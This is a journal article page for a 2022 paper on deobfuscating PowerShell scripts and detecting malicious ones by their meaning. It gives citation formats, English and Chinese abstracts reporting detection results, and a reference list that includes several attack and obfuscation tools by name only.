Journal of Zhejiang University

Frontiers of Information Technology & Electronic Engineering 2022 Vol.23 No.3 P.361-381

http://doi.org/10.1631/FITEE.2000436

Generic, efficient, and effective deobfuscation and semantic-aware attack detection for PowerShell scripts

Author(s): Chunlin XIONG, Zhenyuan LI, Yan CHEN, Tiantian ZHU, Jian WANG, Hai YANG, Wei RUAN
Affiliation(s): 1. College of Computer Science and Technology, Zhejiang University, Hangzhou 310027, China more
Corresponding email(s): chunlinxiong94@zju.edu.cn, ruanwei@zju.edu.cn
Key Words: PowerShell, Abstract syntax tree, Obfuscation and deobfuscation, Malicious script detection

Share this article to： More <<< Previous Article \|Next Article >>>

Chunlin XIONG, Zhenyuan LI, Yan CHEN, Tiantian ZHU, Jian WANG, Hai YANG, Wei RUAN. Generic, efficient, and effective deobfuscation and semantic-aware attack detection for PowerShell scripts[J]. Frontiers of Information Technology & Electronic Engineering, 2022, 23(3): 361-381.

@article{title="Generic, efficient, and effective deobfuscation and semantic-aware attack detection for PowerShell scripts",
author="Chunlin XIONG, Zhenyuan LI, Yan CHEN, Tiantian ZHU, Jian WANG, Hai YANG, Wei RUAN",
journal="Frontiers of Information Technology & Electronic Engineering",
volume="23",
number="3",
pages="361-381",
year="2022",
publisher="Zhejiang University Press & Springer",
doi="10.1631/FITEE.2000436"
}

%0 Journal Article
%T Generic, efficient, and effective deobfuscation and semantic-aware attack detection for PowerShell scripts
%A Chunlin XIONG
%A Zhenyuan LI
%A Yan CHEN
%A Tiantian ZHU
%A Jian WANG
%A Hai YANG
%A Wei RUAN
%J Frontiers of Information Technology & Electronic Engineering
%V 23
%N 3
%P 361-381
%@ 2095-9184
%D 2022
%I Zhejiang University Press & Springer
%DOI 10.1631/FITEE.2000436

TY - JOUR
T1 - Generic, efficient, and effective deobfuscation and semantic-aware attack detection for PowerShell scripts
A1 - Chunlin XIONG
A1 - Zhenyuan LI
A1 - Yan CHEN
A1 - Tiantian ZHU
A1 - Jian WANG
A1 - Hai YANG
A1 - Wei RUAN
J0 - Frontiers of Information Technology & Electronic Engineering
VL - 23
IS - 3
SP - 361
EP - 381
%@ 2095-9184
Y1 - 2022
PB - Zhejiang University Press & Springer
ER -
DOI - 10.1631/FITEE.2000436

Abstract
Chinese Summary
Academic Network
Reviewer Comment

Abstract: In recent years, powerShell has increasingly been reported as appearing in a variety of cyber attacks. However, because the powerShell language is dynamic by design and can construct script fragments at different levels, state-of-the-art static analysis based powerShell attack detection approaches are inherently vulnerable to obfuscations. In this paper, we design the first generic, effective, and lightweight deobfuscation approach for powerShell scripts. To precisely identify the obfuscated script fragments, we define obfuscation based on the differences in the impacts on the abstract syntax trees of powerShell scripts and propose a novel emulation-based recovery technology. Furthermore, we design the first semantic-aware powerShell attack detection system that leverages the classic objective-oriented association mining algorithm and newly identifies 31 semantic signatures. The experimental results on 2342 benign samples and 4141 malicious samples show that our deobfuscation method takes less than 0.5 s on average and increases the similarity between the obfuscated and original scripts from 0.5% to 93.2%. By deploying our deobfuscation method, the attack detection rates for Windows Defender and VirusTotal increase substantially from 0.33% and 2.65% to 78.9% and 94.0%, respectively. Moreover, our detection system outperforms both existing tools with a 96.7% true positive rate and a 0% false positive rate on average.

通用、有效且轻量的PowerShell解混淆和语义敏感的攻击检测方法

熊春霖¹，李振源¹，陈焰²，朱添田³，王箭¹，杨海⁴，阮伟⁵
¹浙江大学计算机科学与技术学院，中国杭州市，310027
²西北大学电气工程与计算机科学系，美国伊利诺伊州埃文斯顿市，60208
³浙江工业大学计算机科学与技术学院，中国杭州市，310023
⁴杭州奇盾信息技术有限公司，中国杭州市，310027
⁵浙江大学控制科学与工程学院，中国杭州市，310027
摘要：近年来，PowerShell攻击越来越多见诸报道。然而，由于PowerShell语言的动态特性，且可在不同级别构造脚本片段，即使基于最先进的静态脚本分析的PowerShell攻击检测方法，其本质上也容易受到混淆的影响。本文为PowerShell脚本设计了一种通用、有效且轻量的去混淆方法。首先，为精准识别模糊脚本片段，根据混淆方法对PowerShell抽象语法树的影响，提出一种全新混淆片段检测方法，在此基础上提出一种基于仿真的恢复技术。此外，设计了一个语义敏感的PowerShell攻击检测系统，该系统利用经典的面向目标的关联挖掘算法，新识别31个用于恶意脚本检测的语义特征。在2342个良性样本和4141个恶意样本上的实验结果表明，所提去混淆方法平均耗时不到0.5秒，且将模糊脚本和原始脚本的相似度从0.5%提至93.2%。采用该去混淆方法，Windows Defender和VirusTotal的攻击检测率分别从0.33%和2.65%提至78.9%和94.0%。实验还表明，我们的检测系统优于现有两种工具（平均真正例率为96.7%，假正例率为0%）。

关键词：PowerShell；抽象语法树；混淆和解混淆；恶意脚本检测

Darkslateblue:Affiliate; Royal Blue:Author; Turquoise:Article

Reference

[1]AbdelKhalek M, Shosha A, 2017. JSDES: an automated de-obfuscation system for malicious JavaScript. Proc 12^th Int Conf on Availability, Reliability and Security, p.1-13.

[2]Ackerman G, Cole R, Thompson A, et al., 2018. OVERRULED: Containing a Potentially Destructive Adversary. https://bit.ly/2tSUacy [Accessed on Aug. 8, 2020].

[3]Acornjs, 2013. Acorn. https://bit.ly/2BPzkyw [Accessed on Aug. 8, 2020].

[4]Aebersold S, Kryszczuk K, Paganoni S, et al., 2016. Detecting obfuscated JavaScript using machine learning. 11^th Int Conf on Internet Monitoring and Protection, p.11-17.

[5]Ahl I, 2017. Threat Research: Privileges and Credentials: Phished at the Request of Counsel. https://bit.ly/2RaIk5o [Accessed on Aug. 8, 2020].

[6]AST Explorer, 2015. AST Explorer. https://astexplorer.net/ [Accessed on Aug. 8, 2020].

[7]Barak B, Goldreich O, Impagliazzo R, et al., 2012. On the (im)possibility of obfuscating programs. J ACM, 59(2):6.

[8]Bohannon D, 2016. Invoke-Obfuscation. https://bit.ly/2TIEwLN [Accessed on Aug. 8, 2020].

[9]Bohannon D, 2017a. ObfuscatedEmpire–Use an Obfuscated, In-memory PowerShell C2 Channel to Evade AV Signatures. https://bit.ly/36UVYjC [Accessed on Aug. 8, 2020].

[10]Bohannon D, 2017b. PowerShellObfuscation Detection Framework. https://bit.ly/2RhakUP [Accessed on Aug. 8, 2020].

[11]Borgelt C, 2005. An implementation of the FP-growth algorithm. Proc 1^st Int Workshop on Open Source Data Mining: Frequent Pattern Mining Implementations, p.1-5.

[12]Canali D, Cova M, Vigna G, et al., 2011. Prophiler: a fast filter for the large-scale detection of malicious web pages. Proc 20^th Int Conf on World Wide Web, p.197-206.

[13]Candid W, 2016. The Increased Use of PowerShell in Attacks. https://symc.ly/2NmazwO [Accessed on Aug. 8, 2020].

[14]Christodorescu M, Jha S, Seshia SA, et al., 2005. Semantics-aware malware detection. Proc IEEE Symp on Security and Privacy, p.32-46.

[15]Cova M, Kruegel C, Vigna G, 2010. Detection and analysis of drive-by-download attacks and malicious JavaScript code. Proc 19^th Int Conf on World Wide Web, p.281-290.

[16]CrowdStrike, 2014. Free Automated Malware Analysis Service. https://bit.ly/36SUUgd [Accessed on Aug. 8, 2020].

[17]CrowdStrike, 2018. Who Needs Malware? How Adversaries Use Fileless Attacks to Evade Your Security. https://bit.ly/2HZB23i [Accessed on Aug. 8, 2020].

[18]Curtsinger C, Livshits B, Zorn B, et al., 2011. ZOZZLE: fast and precise in-browser JavaScript malware detection. Proc 20^th USENIX Conf on Security, p.33-48.

[19]Diggs R, 2017. Pulling Back the Curtains on EncodedCommand PowerShell Attacks. https://bit.ly/30jVNMr [Accessed on Aug. 8, 2020].

[20]EmpireProject, 2015. Empire Is a PowerShell and Python Post-Exploitation Agent. https://bit.ly/36P13du [Accessed on Aug. 8, 2020].

[21]FOLDOC, 1994. Free On-line Dictionary of Computing: Abstract Syntax Tree. https://foldoc.org/abstract+syntax+tree [Accessed on Aug. 8, 2020].

[22]Fredrikson M, Jha S, Christodorescu M, et al., 2010. Synthesizing near-optimal malware specifications from suspicious behaviors. Proc IEEE Symp on Security and Privacy, p.45-60.

[23]Google, 2004. VirusTotal. https://bit.ly/3a3Pfpz [Accessed on Aug. 8, 2020].

[24]Google, 2011. Traceur-Compiler. https://bit.ly/2BW2hZP [Accessed on Aug. 8, 2020].

[25]Hendler D, Kels S, Rubin A, 2018. Detecting malicious PowerShell commands using deep neural networks. Proc Asia Conf on Computer and Communications Security, p.187-197.

[26]Hidayat A, 2012. ECMAScript Parsing Infrastructure for Multipurpose Analysis. https://esprima.org/ [Accessed on Aug. 8, 2020].

[27]Jodavi M, Abadi M, Parhizkar E, 2015. JSObfusDetector: a binary PSO-based one-class classifier ensemble to detect obfuscated JavaScript code. Proc Int Symp on Artificial Intelligence and Signal Processing, p.322-327.

[28]Kachalov T, 2016. JavaScript-Obfuscator. https://bit.ly/3cSvP7a [Accessed on Aug. 8, 2020].

[29]Kannumittal, 2018. Difference b/w a Programming & Scripting Language. https://www.codingninjas.com/blog/2018/12/08/difference-between-a-programming-language-and-a-scripting-language/

[30]Kaplan S, Livshits B, Zorn B, et al., 2011. “NOFUS: Automatically Detecting” String.fromCharCode(32) “ObFuSCateD” to LowerCase() “JavaScript Code”. Technical Report MSR-TR 2011-57. Microsoft Research.

[31]Koschke R, Falke R, Frenzel P, 2006. Clone detection using abstract syntax suffix trees. Proc 13^th Working Conf on Reverse Engineering, p.253-262.

[32]Li ZY, Chen QA, Xiong CL, et al., 2019. Effective and light-weight deobfuscation and semantic-aware attack detection for PowerShell scripts. Proc ACM SIGSAC Conf on Computer and Communications Security, p.1831-1847.

[33]Liu C, Xia B, Yu M, et al., 2018. PSDEM: a feasible de-obfuscation method for malicious PowerShell detection. Proc IEEE Symp on Computers and Communications, p.825-831.

[34]Lu G, Debray S, 2012. Automatic simplification of obfuscated JavaScript code: a semantics-based approach. Proc IEEE 6^th Int Conf on Software Security and Reliability, p.31-40.

[35]Maniar V, 2018. PowerShell-RAT. https://bit.ly/2uOD7ZH [Accessed on Aug. 8, 2020].

[36]Mateas M, Montfort N, 2005. A box, darkly: obfuscation, weird languages, and code aesthetics. Proc 6^th Digital Arts and Culture Conf, p.144-153.

[37]Microsoft, 2014. Submit a File for Malware Analysis—Microsoft Security Intelligence. https://bit.ly/2TgVYXo [Accessed on Aug. 8, 2020].

[38]Microsoft, 2019. Antimalware Scan Interface (AMSI). https://bit.ly/3hHhXBJ [Accessed on Aug. 8, 2020].

[39]Mishoo, 2015. UglifyJS. https://bit.ly/30wOWkM [Accessed on Aug. 8, 2020].

[40]MITRE, 2015. MITRE ATT & CK. https://attack.mitre.org/ [Accessed on Aug. 8, 2020].

[41]MITRE, 2020. Technique: PowerShell-MITRE ATT&CKTM. https://bit.ly/36SVSsR [Accessed on Aug. 8, 2020].

[42]PowerShellMafia, 2012. PowerSploit: a PowerShell Post-Exploitation Framework—PowerShellMafia/ PowerSploit. https://bit.ly/36STQJ9 [Accessed on Aug. 8, 2020].

[43]R3MRUM, 2018. PowerShell Script for Deobfuscating Encoded PowerShell Scripts: R3mrum/PSDecode https://github.com/R3MRUM/PSDecode [Accessed on Aug. 8, 2020].

[44]Reactor NET, 2003. Code Virtualization. https://www.eziriz.com [Accessed on Aug. 8, 2020].

[45]Rieck K, Krueger T, Dewald A, 2010. Cujo: efficient detection and prevention of drive-by-download attacks. Proc 26^th Annual Computer Security Applications Conf, p.31-39.

[46]Rubin A, Kels S, Hendler D, 2019. AMSI-based detection of malicious PowerShell code using contextual embeddings. https://arxiv.org/abs/1905.09538

[47]Rusak G, Al-Dujaili A, O’Reilly UM, 2018. AST-based deep learning for detecting malicious PowerShell. Proc ACM SIGSAC Conf on Computer and Communications Security, p.2276-2278.

[48]Samratashok, 2020. What Is PowerShell? https://bit.ly/3f8U5DS [Accessed on Aug. 8, 2020].

[49]Scraper W, 2019. Web Scraper. https://www.webscraper.io/ [Accessed on Aug. 8, 2020].

[50]ShapeSecurity, 2015. Shift-parser-js. https://bit.ly/3fe0HRj [Accessed on Aug. 8, 2020].

[51]Shen YD, Zhang Z, Yang Q, 2002. Objective-oriented utility-based association mining. Proc IEEE Int Conf on Data Mining, p.426-433.

[52]Symantec, 2018. Security Center White Papers | Symantec. https://symc.ly/2TlKphr [Accessed on Aug. 8, 2020].

[53]Tobias W, 2018. New Obfuscation Modes. https://bit.ly/2FJhJae [Accessed on Aug. 8, 2020].

[54]Ugarte D, Maiorca D, Cara F, et al., 2019. PowerDrive: accurate de-obfuscation and analysis of PowerShell malware. Proc 16^th Int Conf on Detection of Intrusions and Malware, and Vulnerability Assessment, p.240-259.

[55]Wueest C, Anand H, 2017. ISTR Living off the Land and Fileless Attack Techniques. https://symc.ly/2FP6v3X [Accessed on Aug. 8, 2020].

[56]Wueest C, Stephen D, 2016. The Increased Use of PowerShell in Attacks. https://symc.ly/35Qj1ef [Accessed on Aug. 8, 2020].

[57]Xiong CL, Zhu TT, Dong WH, et al., 2022. Conan: a practical real-time APT detection system with high accuracy and efficiency. IEEE Trans Depend Sec Comput, 19(1):551-565.

[58]Xu W, Zhang FF, Zhu SC, 2012. The power of obfuscation techniques in malicious JavaScript code: a measurement study. Proc 7^th Int Conf on Malicious and Unwanted Software, p.9-16.

[59]Ye YF, Wang DD, Li T, et al., 2008. An intelligent PE-malware detection system based on association mining. J Comput Virol, 4(4):323-334.

Open peer comments: Debate/Discuss/Question/Opinion

<1>